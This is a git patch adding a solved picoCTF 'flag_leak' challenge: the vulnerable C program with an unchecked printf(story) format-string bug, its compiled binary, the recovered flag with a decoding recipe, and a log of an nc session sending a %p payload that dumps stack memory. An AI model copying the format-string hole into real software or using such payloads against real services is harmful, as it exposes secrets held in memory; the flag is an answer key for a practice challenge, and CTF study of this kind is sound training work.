From f4feacef1d1cc02a9db34051ac747d0be10cfb82 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Tue, 3 Sep 2024 23:03:46 +0200 Subject: [PATCH] pwn/flag_leak --- pwn/flag_leak/flag.txt | 5 +++++ pwn/flag_leak/output.txt | 3 +++ pwn/flag_leak/vuln | Bin 0 -> 15876 bytes pwn/flag_leak/vuln.c | 46 +++++++++++++++++++++++++++++++++++++++ 4 files changed, 54 insertions(+) create mode 100644 pwn/flag_leak/flag.txt create mode 100644 pwn/flag_leak/output.txt create mode 100755 pwn/flag_leak/vuln create mode 100644 pwn/flag_leak/vuln.c diff --git a/pwn/flag_leak/flag.txt b/pwn/flag_leak/flag.txt new file mode 100644 index 0000000..d98d0c0 --- /dev/null +++ b/pwn/flag_leak/flag.txt @@ -0,0 +1,5 @@ +# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238 +# +# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA + +picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824} diff --git a/pwn/flag_leak/output.txt b/pwn/flag_leak/output.txt new file mode 100644 index 0000000..f5f3e94 --- /dev/null +++ b/pwn/flag_leak/output.txt @@ -0,0 +1,3 @@ +$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p" +Tell me a story and then I'll tell you one >> Here's a story - +0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5 diff --git a/pwn/flag_leak/vuln b/pwn/flag_leak/vuln new file mode 100755 index 0000000000000000000000000000000000000000..666c7d1a41b03a6eae1b0f5d5854bf1edd4eab8d GIT binary patch literal 15876 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 +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 64 +#define FLAGSIZE 64 + +void readflag(char* buf, size_t len) { + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,len,f); // size bound read +} + +void vuln(){ + char flag[BUFSIZE]; + char story[128]; + + readflag(flag, FLAGSIZE); + + printf("Tell me a story and then I'll tell you one >> "); + scanf("%127s", story); + printf("Here's a story - \n"); + printf(story); + printf("\n"); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + // Set the gid to the effective gid + // this prevents /bin/sh from dropping the privileges + gid_t gid = getegid(); + setresgid(gid, gid, gid); + vuln(); + return 0; +}